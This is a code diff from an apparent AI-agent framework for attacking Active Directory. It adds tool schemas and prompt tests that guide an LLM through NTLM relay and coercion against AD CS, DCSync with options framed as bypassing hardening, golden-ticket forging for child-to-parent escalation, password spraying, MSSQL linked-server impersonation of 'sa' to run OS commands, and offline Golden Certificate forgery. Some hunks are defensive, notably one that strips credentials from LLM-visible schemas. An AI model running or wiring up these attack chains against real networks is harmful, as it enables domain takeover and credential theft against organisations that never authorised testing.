"t-8", &payload, None).unwrap(); assert!(prompt.contains("MANDATORY TECHNIQUE EXECUTION")); - assert!(prompt.contains("hashes=")); + // Hash values are auto-resolved by the worker — the prompt must not echo + // the hash, and signatures must not include `hashes=` / `nthash=` params. + assert!(!prompt.contains("aad3b435b51404eeaad3b435b51404ee")); + assert!(!prompt.contains("hashes=")); + assert!(!prompt.contains("nthash=")); + assert!(prompt.contains("Auth: nthash (auto-resolved at dispatch")); assert!(prompt.contains("secretsdump")); } @@ -461,7 +479,12 @@ fn exploit_constrained_delegation_with_state() { assert!(prompt.contains("secretsdump_kerberos")); assert!(prompt.contains("psexec_kerberos")); assert!(prompt.contains("cifs/dc01.contoso.local")); - assert!(prompt.contains("SqlPass1")); + // Password must never appear in LLM-facing prompts — auto-resolved at dispatch. + assert!( + !prompt.contains("SqlPass1"), + "password value leaked into prompt:\n{prompt}" + ); + assert!(!prompt.contains("password='")); assert!(prompt.contains("dc01.contoso.local")); } @@ -511,6 +534,56 @@ fn exploit_adcs_esc8() { assert!(prompt.contains("ntlmrelayx")); assert!(prompt.contains("web enrollment")); assert!(!prompt.contains("certipy_request")); + // No coerce_target field provided -> no "Coerce Target:" header rendered + assert!(!prompt.contains("Coerce Target:")); +} + +#[test] +fn exploit_adcs_esc8_renders_coerce_target_when_present() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26", &payload, None).unwrap(); + assert!(prompt.contains("Coerce Target (primary): 192.168.58.20")); + assert!(prompt.contains("Relay Listener: 192.168.58.50")); + assert!(prompt.contains("Coerce 192.168.58.20")); +} + +#[test] +fn exploit_adcs_esc8_renders_fallback_targets() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20", "192.168.58.30", "192.168.58.51"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26b", &payload, None).unwrap(); + assert!(prompt.contains("Fallback Coerce Targets")); + assert!(prompt.contains("192.168.58.30")); + assert!(prompt.contains("192.168.58.51")); +} + +#[test] +fn exploit_adcs_esc8_omits_fallback_block_when_only_one_candidate() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26c", &payload, None).unwrap(); + assert!(!prompt.contains("Fallback Coerce Targets")); } #[test] @@ -549,6 +622,49 @@ fn exploit_child_to_parent_has_raise_child() { assert!(prompt.contains("Enterprise Admins")); } +#[test] +fn exploit_child_to_parent_offers_extra_sid_via_child_krbtgt() { + let payload = serde_json::json!({ + "vuln_type": "child_to_parent", + "target": "192.168.58.10", + "domain": "child.contoso.local", + "trusted_domain": "contoso.local", + "username": "Administrator", + "password": "P@ss1", + "dc_ip": "192.168.58.10", + "source_sid": "S-1-5-21-1111-2222-3333", + "target_sid": "S-1-5-21-4444-5555-6666", + "child_krbtgt_hash": "8c6d94541dbc90f085e86828428d2cbf", + }); + let prompt = generate_task_prompt("exploit", "t-32", &payload, None).unwrap(); + // ExtraSid via child krbtgt — generate_golden_ticket with extra_sid pointing + // at the parent's Enterprise Admins SID (RID 519). + assert!(prompt.contains("INTRA-FOREST CHILD→PARENT")); + assert!(prompt.contains("generate_golden_ticket")); + // krbtgt hash value must never appear — auto-resolved by the worker at dispatch. + assert!( + !prompt.contains("8c6d94541dbc90f085e86828428d2cbf"), + "krbtgt hash leaked into prompt:\n{prompt}" + ); + assert!(!prompt.contains("krbtgt_hash='")); + // Domain SIDs are non-secret identifiers and CAN appear; ExtraSid still + // shows the RID-519 form so the LLM understands what to compute. + assert!(prompt.contains("S-1-5-21-4444-5555-6666-519")); + // Followed by secretsdump_kerberos on the parent DC. + assert!(prompt.contains("secretsdump_kerberos")); + // The intra-forest path should NOT *invoke* extract_trust_key/get_sid/ + // create_inter_realm_ticket — those are unnecessary when the child krbtgt + // is in hand and previously caused the LLM to bail out on empty creds. + // We allow the names to appear in a "Do NOT call" instruction but never + // as actual function-call syntax. + assert!(!prompt.contains("extract_trust_key(")); + assert!(!prompt.contains("create_inter_realm_ticket(")); + assert!(prompt.contains("Do NOT call extract_trust_key")); + // Fallbacks for SPN target name validation / DRSUAPI hardening. + assert!(prompt.contains("just_dc_user='krbtgt'")); + assert!(prompt.contains("use_vss=true")); +} + #[test] fn exploit_mssql_lateral_enumeration() { let state = StateSnapshot { diff --git a/ares-llm/src/routing/credentials.rs b/ares-llm/src/routing/credentials.rs index ff72f614..c37cc46e 100644 --- a/ares-llm/src/routing/credentials.rs +++ b/ares-llm/src/routing/credentials.rs @@ -11,8 +11,9 @@ use super::domain::normalize_domain; /// Enforces AD trust-scope rules: /// - Same domain: always valid /// - Parent → child: parent-domain creds can authenticate to child domain LDAP -/// - Child → parent: blocked (child creds cannot auth to parent LDAP) -/// - Cross-forest: blocked for direct LDAP authentication +/// - Child → parent: valid (NTLM/Kerberos auth traverses parent-child trust) +/// - Cross-forest bidirectional: valid (NTLM auth traverses forest trust) +/// - Cross-forest one-way inbound only: blocked pub fn is_valid_credential_for_domain( cred_domain: &str, target_domain: &str, @@ -32,15 +33,24 @@ pub fn is_valid_credential_for_domain( return true; } - // Child → parent: blocked + // Child → parent: valid — NTLM/Kerberos authentication traverses the + // parent-child trust bidirectionally. The target DC forwards the auth + // request to the child domain DC via the trust's secure channel. // e.g. cred=north.contoso.local, target=contoso.local if cred_lower.ends_with(&format!(".{target_lower}")) { - return false; + return true; } - // Cross-forest: block if either side is a known trust - if trusted_domains.contains_key(&target_lower) || trusted_domains.contains_key(&cred_lower) { - return false; + // Cross-forest: allow if bidirectional trust exists + if let Some(trust) = trusted_domains.get(&target_lower) { + if trust.direction == "bidirectional" || trust.direction == "outbound" { + return true; + } + } + if let Some(trust) = trusted_domains.get(&cred_lower) { + if trust.direction == "bidirectional" || trust.direction == "inbound" { + return true; + } } // Unknown relationship: block by default (cross-domain LDAP without trust info is risky) @@ -188,9 +198,9 @@ mod tests { } #[test] - fn child_to_parent_blocked() { + fn child_to_parent_valid() { let trusts = HashMap::new(); - assert!(!is_valid_credential_for_domain( + assert!(is_valid_credential_for_domain( "north.contoso.local", "contoso.local", &trusts @@ -198,7 +208,7 @@ mod tests { } #[test] - fn cross_forest_blocked() { + fn cross_forest_bidirectional_valid() { let mut trusts = HashMap::new(); trusts.insert( "fabrikam.local".to_string(), @@ -210,6 +220,17 @@ mod tests { sid_filtering: true, }, ); + assert!(is_valid_credential_for_domain( + "contoso.local", + "fabrikam.local", + &trusts + )); + } + + #[test] + fn cross_forest_no_trust_blocked() { + let trusts = HashMap::new(); + // No trust info at all → blocked assert!(!is_valid_credential_for_domain( "contoso.local", "fabrikam.local", @@ -228,11 +249,12 @@ mod tests { } #[test] - fn child_cred_blocked_for_parent_domain() { + fn child_cred_valid_for_parent_domain() { let trusts = HashMap::new(); let creds = vec![make_cred("admin", "north.contoso.local", "P@ss1")]; let map = HashMap::new(); let found = find_domain_credential("contoso.local", &creds, &map, &trusts); - assert!(found.is_none()); + assert!(found.is_some()); + assert_eq!(found.unwrap().domain, "north.contoso.local"); } } diff --git a/ares-llm/src/tool_registry/blue/state.rs b/ares-llm/src/tool_registry/blue/state.rs index a92085c0..3ac83e4f 100644 --- a/ares-llm/src/tool_registry/blue/state.rs +++ b/ares-llm/src/tool_registry/blue/state.rs @@ -9,7 +9,7 @@ pub(super) fn investigation_state_tool_definitions() -> Vec { vec![ ToolDefinition { name: "add_evidence".into(), - description: "Add a single evidence item to the investigation. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), + description: "Add a single evidence item to the investigation. The `value` MUST be an IOC that appeared in a recent Loki/Prometheus query result (or a MITRE technique ID like T1003.006) — values not seen in observed query data are rejected. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), input_schema: json!({ "type": "object", "properties": { @@ -54,7 +54,7 @@ pub(super) fn investigation_state_tool_definitions() -> Vec { }, ToolDefinition { name: "add_evidence_batch".into(), - description: "Add multiple evidence items in a single call. Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), + description: "Add multiple evidence items in a single call. Each item's `value` MUST be an IOC observed in a recent Loki/Prometheus query (or a MITRE technique ID) — items whose values were not seen in any recorded query result are rejected. Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), input_schema: json!({ "type": "object", "properties": { diff --git a/ares-llm/src/tool_registry/coercion.rs b/ares-llm/src/tool_registry/coercion.rs index 9c295e1a..28836562 100644 --- a/ares-llm/src/tool_registry/coercion.rs +++ b/ares-llm/src/tool_registry/coercion.rs @@ -195,6 +195,49 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target_ip"] }), }, + ToolDefinition { + name: "relay_and_coerce".into(), + description: "Run the full ADCS ESC8 relay+coerce attack as ONE deterministic call. Starts ntlmrelayx targeting the AD CS web enrollment endpoint, then coerces a remote machine to authenticate back: phase 1 attempts unauthenticated PetitPotam (works on unpatched DCs without any creds — preferred); phase 2 falls back to authenticated DFSCoerce (MS-DFSNM); phase 3 falls back to coercer over MS-EFSR → MS-RPRN if creds are supplied. CRITICAL: source ≠ target. coerce_target MUST be a different machine than ca_host — Windows NTLM same-machine loopback protection blocks relay when the coerced host is the relay target. Coerce a DC or other machine and relay it to the CA. The captured certificate is decoded from the relay log and a `certificate_obtained` vulnerability is emitted automatically — `auto_certipy_auth` will then PKINIT and extract the NT hash. Use this instead of orchestrating ntlmrelayx_to_adcs + petitpotam/coercer manually.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_host": { + "type": "string", + "description": "AD CS server IP/hostname running the Certificate Authority web enrollment service (HTTP /certsrv)" + }, + "coerce_target": { + "type": "string", + "description": "Machine to coerce (NOT ca_host — must be a different host). Its machine account is what the relay will impersonate. Typically a DC's IP/hostname; in cross-forest scenarios any reachable machine in the target's RPC scope works." + }, + "attacker_ip": { + "type": "string", + "description": "Local listener IP that the coerced machine will authenticate to" + }, + "coerce_user": { + "type": "string", + "description": "Optional username for authenticated coercer fallback (only needed if unauth PetitPotam is patched; cross-forest: child user with RPC access)" + }, + "coerce_password": { + "type": "string", + "description": "Password for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_hash": { + "type": "string", + "description": "NT hash for coerce_user (provide either coerce_password OR coerce_hash; only required if coerce_user is set)" + }, + "coerce_domain": { + "type": "string", + "description": "Domain for coerce_user (the user's home realm, may differ from coerce_target's realm; only required if coerce_user is set)" + }, + "template": { + "type": "string", + "description": "Certificate template to request (default: DomainController)", + "default": "DomainController" + } + }, + "required": ["ca_host", "coerce_target", "attacker_ip"] + }), + }, ToolDefinition { name: "ntlmrelayx_multirelay".into(), description: "Relay captured NTLM authentication to multiple SMB targets simultaneously. Attempts to dump SAM database hashes from each target where the relayed account has local administrator privileges.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs index 977f1de4..47360028 100644 --- a/ares-llm/src/tool_registry/credential_access/netexec_tools.rs +++ b/ares-llm/src/tool_registry/credential_access/netexec_tools.rs @@ -53,7 +53,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password to spray" + "description": "Single candidate password to spray across all users (e.g. 'Welcome1'). Either this OR `use_common_passwords` must be set." + }, + "use_common_passwords": { + "type": "boolean", + "description": "If true, spray a built-in list of common passwords instead of a single candidate. Mutually exclusive with `password`." }, "domain": { "type": "string", @@ -74,9 +78,13 @@ pub fn definitions() -> Vec { "acknowledge_no_policy": { "type": "boolean", "description": "Override that allows spraying without lockout_threshold. Use only when password_policy cannot be retrieved; lockouts are likely." + }, + "excluded_users": { + "type": "string", + "description": "Comma-separated usernames to drop from the wordlist before spraying. Use this with the quarantine list provided in the task payload to avoid re-locking already-locked accounts." } }, - "required": ["target", "password", "domain"] + "required": ["target", "domain"] }), }, ToolDefinition { @@ -96,11 +104,41 @@ pub fn definitions() -> Vec { "domain": { "type": "string", "description": "Target domain name" + }, + "excluded_users": { + "type": "string", + "description": "Comma-separated usernames to drop from the wordlist before spraying. Use this with the quarantine list provided in the task payload to avoid re-locking already-locked accounts." } }, "required": ["target", "domain"] }), }, + ToolDefinition { + name: "smb_login_check".into(), + description: "Validate a single credential against a target via SMB. Use this to verify that a credential works before attempting more complex attacks.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Target IP address or hostname" + }, + "username": { + "type": "string", + "description": "Username to authenticate with" + }, + "password": { + "type": "string", + "description": "Password to authenticate with" + }, + "domain": { + "type": "string", + "description": "Target domain name" + } + }, + "required": ["target", "username", "password", "domain"] + }), + }, ToolDefinition { name: "gpp_password_finder".into(), description: "Search Group Policy Preferences for credentials (cpassword). Finds GPP XML files in SYSVOL containing encrypted passwords that can be trivially decrypted.".into(), diff --git a/ares-llm/src/tool_registry/credential_access/secretsdump.rs b/ares-llm/src/tool_registry/credential_access/secretsdump.rs index b89b45e8..2e7d754f 100644 --- a/ares-llm/src/tool_registry/credential_access/secretsdump.rs +++ b/ares-llm/src/tool_registry/credential_access/secretsdump.rs @@ -43,6 +43,14 @@ pub fn definitions() -> Vec { "type": "string", "description": "Path to Kerberos ccache ticket file for authentication" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening that blocks full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy extraction instead of DRSUAPI. Falls back when DRSUAPI is hardened." + }, "timeout_minutes": { "type": "integer", "description": "Overall operation timeout in minutes (default: 3)", diff --git a/ares-llm/src/tool_registry/lateral/execution.rs b/ares-llm/src/tool_registry/lateral/execution.rs index e8364d2c..56a94d47 100644 --- a/ares-llm/src/tool_registry/lateral/execution.rs +++ b/ares-llm/src/tool_registry/lateral/execution.rs @@ -416,6 +416,14 @@ pub fn definitions() -> Vec { "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." + }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", @@ -464,6 +472,14 @@ pub fn secretsdump_kerberos_definition() -> Vec { "type": "string", "description": "Target IP address (if different from hostname resolution)" }, + "just_dc_user": { + "type": "string", + "description": "Restrict DCSync to a single account (e.g. 'krbtgt' or 'Administrator'). Bypasses 'SPN target name validation' / DRSUAPI hardening blocking full dumps." + }, + "use_vss": { + "type": "boolean", + "description": "Use VSS shadow-copy method instead of DRSUAPI replication. Falls back when DRSUAPI is restricted by domain hardening." + }, "timeout_minutes": { "type": "integer", "description": "Maximum time in minutes before aborting the dump", diff --git a/ares-llm/src/tool_registry/lateral/mssql.rs b/ares-llm/src/tool_registry/lateral/mssql.rs index 0b32a043..e9e3b94d 100644 --- a/ares-llm/src/tool_registry/lateral/mssql.rs +++ b/ares-llm/src/tool_registry/lateral/mssql.rs @@ -194,8 +194,12 @@ pub fn definitions() -> Vec { }, ToolDefinition { name: "mssql_exec_linked".into(), - description: "Execute SQL queries on a linked MSSQL server via OPENQUERY. \ - Enables lateral movement through SQL Server linked server chains." + description: "Execute SQL queries on a linked MSSQL server via `EXEC ('...') AT \ + [link]` (RPC OUT). The hop runs as the connecting user's mapped credential, \ + which fails on cross-forest links without Kerberos delegation. For cross-forest \ + pivots: pass `impersonate_user='sa'` to wrap the hop in EXECUTE AS LOGIN \ + (uses the local SeImpersonate path), or use `mssql_openquery` to ride the \ + linked server's stored login mapping." .into(), input_schema: json!({ "type": "object", @@ -228,6 +232,58 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before the hop (EXECUTE AS LOGIN). Use 'sa' to break out of double-hop limits when the local connection has IMPERSONATE on sa." + } + }, + "required": ["target", "username", "password", "linked_server", "query"] + }), + }, + ToolDefinition { + name: "mssql_openquery".into(), + description: "Query a linked MSSQL server via OPENQUERY using the linked server's \ + configured remote login (sp_addlinkedsrvlogin). Bypasses Kerberos double-hop \ + — use this when `mssql_exec_linked` fails on cross-forest links because the \ + connecting principal can't delegate, but the linked server has a stored \ + credential mapping (RPC OUT + sp_addlinkedsrvlogin)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "MSSQL server IP or hostname (entry point)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "linked_server": { + "type": "string", + "description": "Name of the linked server to query" + }, + "query": { + "type": "string", + "description": "SQL query string passed inside OPENQUERY (single quotes auto-escaped)" + }, + "domain": { + "type": "string", + "description": "Domain name for Windows authentication" + }, + "windows_auth": { + "type": "boolean", + "description": "Use Windows authentication instead of SQL auth", + "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate before OPENQUERY (e.g. 'sa') for IMPERSONATE-based escalation." } }, "required": ["target", "username", "password", "linked_server", "query"] @@ -236,7 +292,8 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_enable_xpcmdshell".into(), description: "Enable xp_cmdshell on a linked MSSQL server. Required before \ - executing OS commands on the linked server." + executing OS commands on the linked server. Pass `impersonate_user='sa'` \ + for cross-forest hops where the connecting principal lacks delegation." .into(), input_schema: json!({ "type": "object", @@ -265,6 +322,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." } }, "required": ["target", "username", "password", "linked_server"] @@ -273,7 +334,9 @@ pub fn definitions() -> Vec { ToolDefinition { name: "mssql_linked_xpcmdshell".into(), description: "Execute an OS command via xp_cmdshell on a linked MSSQL server. \ - Requires xp_cmdshell to be enabled on the linked server first." + Requires xp_cmdshell to be enabled on the linked server first. Pass \ + `impersonate_user='sa'` for cross-forest hops where the connecting \ + principal can't double-hop." .into(), input_schema: json!({ "type": "object", @@ -306,6 +369,10 @@ pub fn definitions() -> Vec { "type": "boolean", "description": "Use Windows authentication instead of SQL auth", "default": true + }, + "impersonate_user": { + "type": "string", + "description": "Optional source-side login to impersonate (EXECUTE AS LOGIN) before the hop." } }, "required": ["target", "username", "password", "linked_server", "command"] diff --git a/ares-llm/src/tool_registry/mod.rs b/ares-llm/src/tool_registry/mod.rs index b2fa2573..ee7640f2 100644 --- a/ares-llm/src/tool_registry/mod.rs +++ b/ares-llm/src/tool_registry/mod.rs @@ -104,6 +104,102 @@ pub fn is_callback_tool(name: &str) -> bool { CALLBACK_TOOLS.contains(&name) } +/// JSON schema property keys that contain secret material. +/// +/// These are stripped from every tool's `input_schema` before tool definitions +/// are sent to the LLM. The LLM names principals (`username`, `domain`); the +/// worker's credential resolver injects secrets from harvested operation state +/// at dispatch time. +/// +/// Keep this in lock-step with `ares-cli/src/worker/credential_resolver.rs::CREDENTIAL_KEYS`. +pub const SECRET_SCHEMA_KEYS: &[&str] = &[ + "password", + "hash", + "nt_hash", + "ntlm_hash", + "aes_key", + "aes256_key", + "ticket_path", + "krbtgt_hash", + "child_krbtgt_hash", + "parent_krbtgt_hash", + "trust_key", + "trust_aes_key", + "trust_hash", + "admin_hash", + "coerce_password", + "coerce_hash", + "domain_sid", + "source_sid", + "target_sid", + "extra_sid", + "kerberos_keys", +]; + +/// Names of callback tools whose `password` / `hash` arguments are part of the +/// callback contract (e.g. tools that record harvested credentials). These are +/// exempt from secret-stripping. +const CALLBACK_NAMES_WITH_SECRETS: &[&str] = &[ + "list_credentials", + "get_credential_summary", + "get_hash_summary", + "get_all_credentials", + "get_all_hashes", + "get_hash_value", +]; + +/// Per-tool exposed-key exemptions. For tools where a "secret-shaped" argument +/// is actually input *data* (e.g. `password_spray.password` is the candidate +/// password to spray, not a credential to look up), the named keys remain in +/// the LLM-visible schema. The credential resolver will not inject anything +/// for these keys because the calls have no `(username, domain)` principal. +fn exposed_secret_keys(tool_name: &str) -> &'static [&'static str] { + match tool_name { + "password_spray" => &["password"], + _ => &[], + } +} + +/// Strip every secret-bearing property from a tool's input schema. +/// +/// Mutates `input_schema.properties` to remove keys in `SECRET_SCHEMA_KEYS`, +/// and prunes those keys from the `required[]` array. The LLM never sees a +/// slot for them — except for keys explicitly exposed by `exposed_secret_keys` +/// for tools where the argument represents input data rather than a credential. +fn strip_secret_fields(tool: &mut ToolDefinition) { + if CALLBACK_NAMES_WITH_SECRETS.contains(&tool.name.as_str()) { + return; + } + let Some(obj) = tool.input_schema.as_object_mut() else { + return; + }; + + let exposed = exposed_secret_keys(&tool.name); + + if let Some(props) = obj.get_mut("properties").and_then(|v| v.as_object_mut()) { + for key in SECRET_SCHEMA_KEYS { + if exposed.contains(key) { + continue; + } + props.remove(*key); + } + } + + if let Some(req) = obj.get_mut("required").and_then(|v| v.as_array_mut()) { + req.retain(|v| match v.as_str() { + Some(s) => exposed.contains(&s) || !SECRET_SCHEMA_KEYS.contains(&s), + None => true, + }); + } +} + +/// Apply `strip_secret_fields` to every tool in a definitions list. +fn strip_secrets_from_all(tools: &mut [ToolDefinition]) { + for tool in tools.iter_mut() { + strip_secret_fields(tool); + } +} + fn callback_tool_definitions() -> Vec { vec![ ToolDefinition { @@ -217,6 +313,10 @@ pub fn tools_for_role(role: AgentRole) -> Vec { tools.extend(reporting::tool_definitions()); tools.extend(callback_tool_definitions()); + // Strip credential fields from every tool schema. The LLM names principals; + // the worker's credential_resolver injects secrets at dispatch time. + strip_secrets_from_all(&mut tools); + tools } @@ -251,6 +351,10 @@ pub fn tools_for_capabilities(capabilities: &[String]) -> Vec { // Always include reporting + callback tools matched.extend(reporting::tool_definitions()); matched.extend(callback_tool_definitions()); + + // Strip credential fields — see tools_for_role. + strip_secrets_from_all(&mut matched); + matched } @@ -285,6 +389,92 @@ mod tests { assert!(!is_callback_tool("secretsdump")); } + #[test] + fn no_secret_fields_in_any_role_schema() { + for role in [ + AgentRole::Recon, + AgentRole::CredentialAccess, + AgentRole::Cracker, + AgentRole::Acl, + AgentRole::Privesc, + AgentRole::Lateral, + AgentRole::Coercion, + AgentRole::Orchestrator, + ] { + let tools = tools_for_role(role); + for tool in &tools { + if CALLBACK_NAMES_WITH_SECRETS.contains(&tool.name.as_str()) { + continue; + } + let exposed = exposed_secret_keys(&tool.name); + let props = tool + .input_schema + .get("properties") + .and_then(|v| v.as_object()); + if let Some(props) = props { + for key in SECRET_SCHEMA_KEYS { + if exposed.contains(key) { + continue; + } + assert!( + !props.contains_key(*key), + "Tool '{}' (role {:?}) leaks secret field '{}' to LLM", + tool.name, + role, + key + ); + } + } + let req = tool.input_schema.get("required").and_then(|v| v.as_array()); + if let Some(req) = req { + for v in req { + if let Some(s) = v.as_str() { + assert!( + exposed.contains(&s) || !SECRET_SCHEMA_KEYS.contains(&s), + "Tool '{}' (role {:?}) requires secret field '{}'", + tool.name, + role, + s + ); + } + } + } + } + } + } + + #[test] + fn no_secret_fields_in_capability_schemas() { + let caps: Vec = ["psexec", "secretsdump", "generate_golden_ticket"] + .iter() + .map(|s| s.to_string()) + .collect(); + let tools = tools_for_capabilities(&caps); + for tool in &tools { + if CALLBACK_NAMES_WITH_SECRETS.contains(&tool.name.as_str()) { + continue; + } + let exposed = exposed_secret_keys(&tool.name); + if let Some(props) = tool + .input_schema + .get("properties") + .and_then(|v| v.as_object()) + { + for key in SECRET_SCHEMA_KEYS { + if exposed.contains(key) { + continue; + } + assert!( + !props.contains_key(*key), + "Capability tool '{}' leaks secret field '{}' to LLM", + tool.name, + key + ); + } + } + } + } + #[test] fn tool_schemas_valid_json() { for role in [ @@ -560,6 +750,10 @@ mod tests { } } + // ----------------------------------------------------------------------- + // Blue team tool registry tests + // ----------------------------------------------------------------------- + #[cfg(feature = "blue")] mod blue_tests { use crate::tool_registry::blue::{ diff --git a/ares-llm/src/tool_registry/privesc/adcs.rs b/ares-llm/src/tool_registry/privesc/adcs.rs index 3f09edc1..5b53e517 100644 --- a/ares-llm/src/tool_registry/privesc/adcs.rs +++ b/ares-llm/src/tool_registry/privesc/adcs.rs @@ -10,7 +10,7 @@ pub fn definitions() -> Vec { name: "certipy_find".into(), description: "Find vulnerable certificate templates in Active Directory Certificate \ Services (AD CS). Enumerates CAs, templates, and identifies exploitable \ - misconfigurations (ESC1-ESC8)." + misconfigurations (ESC1-ESC15)." .into(), input_schema: json!({ "type": "object", @@ -31,13 +31,17 @@ pub fn definitions() -> Vec { "type": "string", "description": "Domain controller IP address" }, + "hashes": { + "type": "string", + "description": "NTLM hash for pass-the-hash (format: 'lmhash:nthash' or just ':nthash'). Use instead of password." + }, "vulnerable": { "type": "boolean", "description": "Only show vulnerable templates. Defaults to true.", "default": true } }, - "required": ["domain", "username", "password", "dc_ip"] + "required": ["domain", "username", "dc_ip"] }), }, ToolDefinition { @@ -77,6 +81,22 @@ pub fn definitions() -> Vec { "type": "string", "description": "User Principal Name to request the certificate for. Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname to connect to for certificate enrollment. REQUIRED when the CA is on a different host than the DC (e.g. CA on a member server, DC on the domain controller). Without this, certipy tries RPC on the DC which fails with ept_s_not_registered." + }, + "sid": { + "type": "string", + "description": "Object SID to embed in the certificate (e.g. 'S-1-5-21-...-500' for Administrator). Required by certipy v5+ to prevent SID mismatch errors during certipy_auth. For Administrator, use the domain SID + '-500'." + }, + "out": { + "type": "string", + "description": "Output filename for the PFX certificate (without .pfx extension). A unique name is auto-generated if not specified. The resulting file will be .pfx — use this path for certipy_auth's pfx_path parameter." + }, + "application_policies": { + "type": "string", + "description": "Application policy OID to include in the certificate request. Used for ESC15 (CVE-2024-49019) exploitation where the template uses application policy OIDs for authorization." } }, "required": ["domain", "username", "password", "dc_ip", "ca", "template"] @@ -111,7 +131,8 @@ pub fn definitions() -> Vec { name: "certipy_shadow".into(), description: "Exploit Shadow Credentials by adding a Key Credential to a target \ account's msDS-KeyCredentialLink attribute via Certipy, then authenticating \ - with the resulting certificate." + with the resulting certificate. Provide either `password` or `hashes` for \ + authentication." .into(), input_schema: json!({ "type": "object", @@ -126,7 +147,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password for authentication" + "description": "Password for authentication. Optional if `hashes` is provided." + }, + "hashes": { + "type": "string", + "description": "NTLM hash for pass-the-hash (format: 'lmhash:nthash' or just ':nthash'). Use instead of password." }, "dc_ip": { "type": "string", @@ -137,7 +162,7 @@ pub fn definitions() -> Vec { "description": "Target account to add shadow credentials to" } }, - "required": ["domain", "username", "password", "dc_ip", "target"] + "required": ["domain", "username", "dc_ip", "target"] }), }, ToolDefinition { @@ -210,10 +235,207 @@ pub fn definitions() -> Vec { "type": "string", "description": "UPN of the target user to impersonate. Defaults to Administrator.", "default": "Administrator" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." } }, "required": ["domain", "username", "password", "dc_ip", "template", "ca"] }), }, + ToolDefinition { + name: "certipy_ca".into(), + description: + "Manage a Certificate Authority using Certipy. Can add yourself as a \ + CA officer (ManageCA right required), issue a pending certificate request, or \ + back up the CA's private key + certificate (requires SYSTEM/local admin on the \ + CA host — produces a PFX usable for offline certificate forgery via certipy_forge)." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "add_officer": { + "type": "boolean", + "description": "Add yourself as a CA officer. Requires ManageCA rights." + }, + "issue_request": { + "type": "integer", + "description": "Issue (approve) a pending certificate request by its request ID." + }, + "backup": { + "type": "boolean", + "description": "Back up the CA private key + certificate to a PFX. Requires SYSTEM or local admin on the CA host (use the credential of an account with that access). Output PFX is the input to certipy_forge for offline Golden Certificate forgery." + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, + ToolDefinition { + name: "certipy_forge".into(), + description: "Forge a certificate offline using a CA's backed-up private key (Golden \ + Certificate). Use after certipy_ca with backup=true to produce a PFX for any UPN \ + in the CA's domain — bypasses normal enrollment, no DC interaction. The forged \ + PFX feeds certipy_auth to obtain the target user's NT hash via PKINIT." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "ca_pfx": { + "type": "string", + "description": "Path to the CA's backed-up PFX file (produced by certipy_ca with backup=true)." + }, + "upn": { + "type": "string", + "description": "User Principal Name to forge the certificate for (e.g. 'administrator@contoso.local'). Used as the certificate subject for PKINIT authentication." + }, + "subject": { + "type": "string", + "description": "Optional certificate subject (Distinguished Name). Defaults to a sensible value derived from the UPN." + }, + "template": { + "type": "string", + "description": "Optional 